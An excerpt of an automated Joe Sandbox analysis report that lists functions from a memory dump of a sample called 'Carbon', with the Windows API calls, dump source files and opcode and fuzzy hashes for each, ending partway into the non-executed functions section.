                                                            • API String ID: 176396367-0
                                                            • Opcode ID: 1d5f18026a2aea0eb86b747c449d749274531d2aa9ed3270faaa6109fca9b9dd
                                                            • Instruction ID: effb04eb1cdd82c79e7293901b80a120efe2b1206ca211c6f12fff5b315855e6
                                                            • Opcode Fuzzy Hash: 1d5f18026a2aea0eb86b747c449d749274531d2aa9ed3270faaa6109fca9b9dd
                                                            • Instruction Fuzzy Hash: 61F0CDB27017087ED7145F38D806BA6BB94EB84360F10852AFB1DCB2D1DB75E5908B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0096F674 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0096F6B1
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentVariable
                                                            • String ID:
                                                            • API String ID: 1431749950-0
                                                            • Opcode ID: c80c030a4c6ec87e920ed35b419ba0d8a97a1b561e20ad6331108d9330381186
                                                            • Instruction ID: 170074ffa6480eeae2a433ebb051f9c581117f640df9af81abd14c530ce88ddf
                                                            • Opcode Fuzzy Hash: c80c030a4c6ec87e920ed35b419ba0d8a97a1b561e20ad6331108d9330381186
                                                            • Instruction Fuzzy Hash: 44F03171604209BFCB04EB65DC46E9F7BACEF85720F000055F505DB361EAB4AE81CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00924FCD Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00923179,00000001,00000364,?,?,?,0000000A,00000000), ref: 0092500E
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 9363b808d0b94eef8e1a6f83280d4e3075f9e1723c2e7dbc10748ddfba386f14
                                                            • Instruction ID: 670f77ac8f5bef8cdd246d54702dae64396f9d5af05cbfead3c4769ab3cfb591
                                                            • Opcode Fuzzy Hash: 9363b808d0b94eef8e1a6f83280d4e3075f9e1723c2e7dbc10748ddfba386f14
                                                            • Instruction Fuzzy Hash: 71F0E931659935A7EB215F22BC05F9A374CBFC2760B178021B81DD6198CA30DC0097F1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00923B70 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00916A59,?,0000015D,?,?,?,?,00918590,000000FF,00000000,?,?), ref: 00923BA2
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: c74de11d67666a82b366a648193c832dca7efa62310cf50e8b64bc728477a396
                                                            • Instruction ID: 31058e15f42809ee6a936e2f7a75c4063b9cd514c1838579dc819972a32de318
                                                            • Opcode Fuzzy Hash: c74de11d67666a82b366a648193c832dca7efa62310cf50e8b64bc728477a396
                                                            • Instruction Fuzzy Hash: 86E02B35214634A6E6212F26FC04F7A375DEF81BB0F078121EC51A20D8DF2CCE0086E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F554C Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2a1e1f298631700afb6f829bdf9a2e8a71e4627c2f2f67f89eaefb80f8b4297
                                                            • Instruction ID: 8a74b58ddbb523a727ba5778972b2b67d8fe2078f30eceeeb65ffa7a6d1eed5d
                                                            • Opcode Fuzzy Hash: d2a1e1f298631700afb6f829bdf9a2e8a71e4627c2f2f67f89eaefb80f8b4297
                                                            • Instruction Fuzzy Hash: 59F039B1505B19CFCB349F74E494826BBE5FF183293248A3EE2D686621C731A884DF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00945A5C Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: 2b7a730b7d10054f7affbdf7b4fabb28a369bbe9d4b1d5084a9765edfbbbd767
                                                            • Instruction ID: 32e0009ce5b7fb53793416e2c192f3defdbf1bd980b168746e94544b2f8b8e6f
                                                            • Opcode Fuzzy Hash: 2b7a730b7d10054f7affbdf7b4fabb28a369bbe9d4b1d5084a9765edfbbbd767
                                                            • Instruction Fuzzy Hash: 7FF02B71B08A045FE7306BB49805F65F7D8FF80310F14491AD8CAC21C2D3BA54D0A7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F56AA Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID:
                                                            • API String ID: 2638373210-0
                                                            • Opcode ID: c1e6ecd98d5466ae11fb2f40a92f4ea408688d1151f6508a8c6824d50e7e42d0
                                                            • Instruction ID: bc4b7df453c18002b2a52a2822d84da2335fc59b523a0796174fa7fb4622e1b7
                                                            • Opcode Fuzzy Hash: c1e6ecd98d5466ae11fb2f40a92f4ea408688d1151f6508a8c6824d50e7e42d0
                                                            • Instruction Fuzzy Hash: A4F0F87150020DFFDF05CF90C941EAEBBB9FB14318F208545F9159A151D336EA61ABA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F2F14 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 008F2F70
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: ff6900c607911e42a65b813ea4c27ba042b7e72516ba34fbb591e4cbe420759a
                                                            • Instruction ID: 5475d981e16bfc09e0a1eee885f95cc73bda7e2b766f94f05115b6c47e57e6c4
                                                            • Opcode Fuzzy Hash: ff6900c607911e42a65b813ea4c27ba042b7e72516ba34fbb591e4cbe420759a
                                                            • Instruction Fuzzy Hash: 03F037709283989FDB529F24DC45BD67BFCA701B08F0400A5A688D61D2DB7457C5CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F3914 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: bce00877132197c1c5bda6b6e065ba5cbfbd5834ae9a4cd8bc9b90dd79dd7f8d
                                                            • Instruction ID: 11e4c974d4cdcf0163adbd28ed43fbb14a0224521fc3ef2d53ab3e9a193a1339
                                                            • Opcode Fuzzy Hash: bce00877132197c1c5bda6b6e065ba5cbfbd5834ae9a4cd8bc9b90dd79dd7f8d
                                                            • Instruction Fuzzy Hash: 7CD0A72374241035A619313D2D07EFF445CCBC27A1B04403FFA06CA2A5EC444C8304E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F318A Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 008F31A9
                                                              • Part of subcall function 008F7467: _wcslen.LIBCMT ref: 008F747A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: LongNamePath_wcslen
                                                            • String ID:
                                                            • API String ID: 541455249-0
                                                            • Opcode ID: 8e0d3c9617e01df1b6d4a212281963c227296aea7a7ee403430df046d917254d
                                                            • Instruction ID: cc7e67245d0b5c6c798d683caec0c11d6a2221bf6b1e4c8a613258fff1077202
                                                            • Opcode Fuzzy Hash: 8e0d3c9617e01df1b6d4a212281963c227296aea7a7ee403430df046d917254d
                                                            • Instruction Fuzzy Hash: 57E0CD725041245BC711A358DC06FEA77DDDFC8790F040071FD05D7344D960DD808695
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F2825 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008F3989: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008F3A5A
                                                              • Part of subcall function 008FDCC0: GetInputState.USER32 ref: 008FDDA7
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008F2853
                                                              • Part of subcall function 008F2F14: Shell_NotifyIconW.SHELL32(00000002,?), ref: 008F2F70
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                            • String ID:
                                                            • API String ID: 3667716007-0
                                                            • Opcode ID: 82dd06522000ab1f0259189974f78d6ac4d7c45ccd67b43e9e138278868e72f6
                                                            • Instruction ID: a5fe7a867b844fa3b17d2dbe96b099ec856df36ef095809f8797b9ce9afba67a
                                                            • Opcode Fuzzy Hash: 82dd06522000ab1f0259189974f78d6ac4d7c45ccd67b43e9e138278868e72f6
                                                            • Instruction Fuzzy Hash: D1E08662B1434C57CA1CBB78AC55E7DAB95EBD0365F40153EF302C2162CE6449559353
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F6903 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindCloseChangeNotification.KERNEL32(?,?,?,008F32C7), ref: 008F6923
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            • Opcode ID: c86d54bc8d988e4c50fe608e9198087b617da3f3eb04ac26623a98b4f3e5e5a1
                                                            • Instruction ID: dad83f8328657070566a8b37768eeb040696833207f4e9f71e2f341251ac3143
                                                            • Opcode Fuzzy Hash: c86d54bc8d988e4c50fe608e9198087b617da3f3eb04ac26623a98b4f3e5e5a1
                                                            • Instruction Fuzzy Hash: 75E09275500B09DEC3314F2AE804422FBF4FED13613204B2ED1E582660E3B0589ADB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095D881 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0095D801,?,?), ref: 0095D897
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CopyFile
                                                            • String ID:
                                                            • API String ID: 1304948518-0
                                                            • Opcode ID: 84ccacefffbade2529aac0ecf75af3187ce4175e5527d2503531e1c6b25e819c
                                                            • Instruction ID: 6e337f2b896e322425e1785d07e87f04235079500b66cffb2978bf3a11f44598
                                                            • Opcode Fuzzy Hash: 84ccacefffbade2529aac0ecf75af3187ce4175e5527d2503531e1c6b25e819c
                                                            • Instruction Fuzzy Hash: ECD0A7305D0208BBEF109B50CC03F99B76CE701B45F104194B101EA0D0C7B5A508A724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009306ED Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00930A57,?,?,00000000,?,00930A57,00000000,0000000C), ref: 0093070A
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: f33bb4673da43d4835d67fb0eb4d00bf67b4269b73431d4fbd1d58f7c6968f02
                                                            • Instruction ID: 0f310253709964aca856c350a224391a4cebaa99edbd436f99d492725d980068
                                                            • Opcode Fuzzy Hash: f33bb4673da43d4835d67fb0eb4d00bf67b4269b73431d4fbd1d58f7c6968f02
                                                            • Instruction Fuzzy Hash: 34D06C3201410DBBDF028F84DD46EDA3BAAFB48714F014000BE1896160C732E821AB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0095E7DA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,0095D57A), ref: 0095E7DB
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 70010f68de4df8c5143f7f36d645ad82de3239bf18826ce6ef63855733eb0ea4
                                                            • Instruction ID: 28d244e0a7c79234b482eb3c736608a77457b0896af3e3a57f81ba8f7eacb111
                                                            • Opcode Fuzzy Hash: 70010f68de4df8c5143f7f36d645ad82de3239bf18826ce6ef63855733eb0ea4
                                                            • Instruction Fuzzy Hash: E8B092B801160005AD2C4A395A08499230A68463BA7D81B80F97A852F1C33A8E0FE710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F1727 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 008F1736
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem
                                                            • String ID:
                                                            • API String ID: 3098949447-0
                                                            • Opcode ID: a4a041439cc96b71a60e7cbca08aab37ad533f40228d9c46c73c9a20c7c76f98
                                                            • Instruction ID: 148dddb7e2745798b7ab1be708f901b015834905afce9f6cb63837a2b188f478
                                                            • Opcode Fuzzy Hash: a4a041439cc96b71a60e7cbca08aab37ad533f40228d9c46c73c9a20c7c76f98
                                                            • Instruction Fuzzy Hash: 99C092326A8344AFE620AB80BC4AF14BB64A348B04F00C403BA09592F383B29420FB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00966376 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0095D98E: FindFirstFileW.KERNEL32(?,?), ref: 0095DA05
                                                              • Part of subcall function 0095D98E: DeleteFileW.KERNEL32(?,?,?,?), ref: 0095DA55
                                                              • Part of subcall function 0095D98E: FindNextFileW.KERNEL32(00000000,00000010), ref: 0095DA66
                                                              • Part of subcall function 0095D98E: FindClose.KERNEL32(00000000), ref: 0095DA7D
                                                            • GetLastError.KERNEL32 ref: 00966398
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                            • String ID:
                                                            • API String ID: 2191629493-0
                                                            • Opcode ID: f7d318de60195e345427b151cc686ec14178bbb8ae2099ff1822c45070a511cb
                                                            • Instruction ID: ecd6ac40ef445de1f6181be01d40432e7c066a00ea587891e9e3236e4fa810e5
                                                            • Opcode Fuzzy Hash: f7d318de60195e345427b151cc686ec14178bbb8ae2099ff1822c45070a511cb
                                                            • Instruction Fuzzy Hash: EFF082322102148FC714EF59D450F6AB7E5FF48720F048049FA0597352DB70BD018B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0096448D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009644AF
                                                            • _wcslen.LIBCMT ref: 009644DC
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0096450C
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0096452D
                                                            • RemoveDirectoryW.KERNEL32(?), ref: 0096453D
                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 009645C4
                                                            • CloseHandle.KERNEL32(00000000), ref: 009645CF
                                                            • CloseHandle.KERNEL32(00000000), ref: 009645DA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
